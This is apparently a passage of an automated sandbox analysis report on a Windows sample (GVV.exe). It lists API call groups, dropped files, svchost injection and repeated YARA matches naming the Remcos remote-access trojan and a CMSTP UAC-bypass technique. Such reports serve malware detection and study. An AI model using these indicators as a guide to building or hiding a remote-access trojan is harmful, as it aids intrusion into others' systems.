memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6e140100-6
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Users\user\Desktop\GVV.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0017D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0017D5EB
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00171201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00171201
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0017E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0017E8F6
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004DE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,4_2_004DE8F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,5_2_004167B4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,15_2_004167B4
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001820460_2_00182046
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001180600_2_00118060
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001782980_2_00178298
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0014E4FF0_2_0014E4FF
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0014676B0_2_0014676B
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001A48730_2_001A4873
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0013CAA00_2_0013CAA0
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0011CAF00_2_0011CAF0
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0012CC390_2_0012CC39
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00146DD90_2_00146DD9
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0012B1190_2_0012B119
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001191C00_2_001191C0
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001313940_2_00131394
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0013781B0_2_0013781B
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001179200_2_00117920
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0012997D0_2_0012997D
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00137A4A0_2_00137A4A
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00137CA70_2_00137CA7
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0019BE440_2_0019BE44
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00149EEE0_2_00149EEE
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_01A836900_2_01A83690
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_0047BF404_2_0047BF40
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004E20464_2_004E2046
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004780604_2_00478060
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004D82984_2_004D8298
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004AE4FF4_2_004AE4FF
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004A676B4_2_004A676B
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_005048734_2_00504873
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_0047CAF04_2_0047CAF0
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_0049CAA04_2_0049CAA0
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_0048CC394_2_0048CC39
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004A6DD94_2_004A6DD9
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_0048B1194_2_0048B119
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004791C04_2_004791C0
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004913944_2_00491394
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_0049781B4_2_0049781B
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_0048997D4_2_0048997D
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004779204_2_00477920
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_00497A4A4_2_00497A4A
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004C3CD24_2_004C3CD2
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_00497CA74_2_00497CA7
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004FBE444_2_004FBE44
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004A9EEE4_2_004A9EEE
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_017836904_2_01783690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0043E0CC5_2_0043E0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041F0FA5_2_0041F0FA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004541595_2_00454159
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004381685_2_00438168
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004461F05_2_004461F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0043E2FB5_2_0043E2FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0045332B5_2_0045332B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0042739D5_2_0042739D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004374E65_2_004374E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0043E5585_2_0043E558
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004387705_2_00438770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004378FE5_2_004378FE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004339465_2_00433946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0044D9C95_2_0044D9C9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00427A465_2_00427A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041DB625_2_0041DB62
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00427BAF5_2_00427BAF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00437D335_2_00437D33
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00435E5E5_2_00435E5E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00426E0E5_2_00426E0E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0043DE9D5_2_0043DE9D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00413FCA5_2_00413FCA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00436FEA5_2_00436FEA
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 14_2_0157369014_2_01573690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0043E0CC15_2_0043E0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0041F0FA15_2_0041F0FA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0045415915_2_00454159
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0043816815_2_00438168
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_004461F015_2_004461F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0043E2FB15_2_0043E2FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0045332B15_2_0045332B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0042739D15_2_0042739D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_004374E615_2_004374E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0043E55815_2_0043E558
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0043877015_2_00438770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_004378FE15_2_004378FE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0043394615_2_00433946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0044D9C915_2_0044D9C9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00427A4615_2_00427A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0041DB6215_2_0041DB62
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00427BAF15_2_00427BAF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00437D3315_2_00437D33
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00435E5E15_2_00435E5E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00426E0E15_2_00426E0E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0043DE9D15_2_0043DE9D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00413FCA15_2_00413FCA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00436FEA15_2_00436FEA
          Source: C:\Users\user\Desktop\GVV.exeCode function: String function: 00130A30 appears 46 times
          Source: C:\Users\user\Desktop\GVV.exeCode function: String function: 00119CB3 appears 31 times
          Source: C:\Users\user\Desktop\GVV.exeCode function: String function: 0012F9F2 appears 40 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00402213 appears 38 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004052FD appears 32 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00434E10 appears 108 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040417E appears 46 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00402093 appears 100 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00434770 appears 82 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00401E65 appears 68 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00401FAB appears 38 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00411F67 appears 32 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004020DF appears 40 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00457A28 appears 34 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004484CA appears 36 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004458D0 appears 56 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004046F7 appears 34 times
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: String function: 0048F9F2 appears 40 times
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: String function: 00479CB3 appears 31 times
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: String function: 00490A30 appears 46 times
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1456
          Source: GVV.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: Process Memory Space: deblaterate.exe PID: 5276, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 2248, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
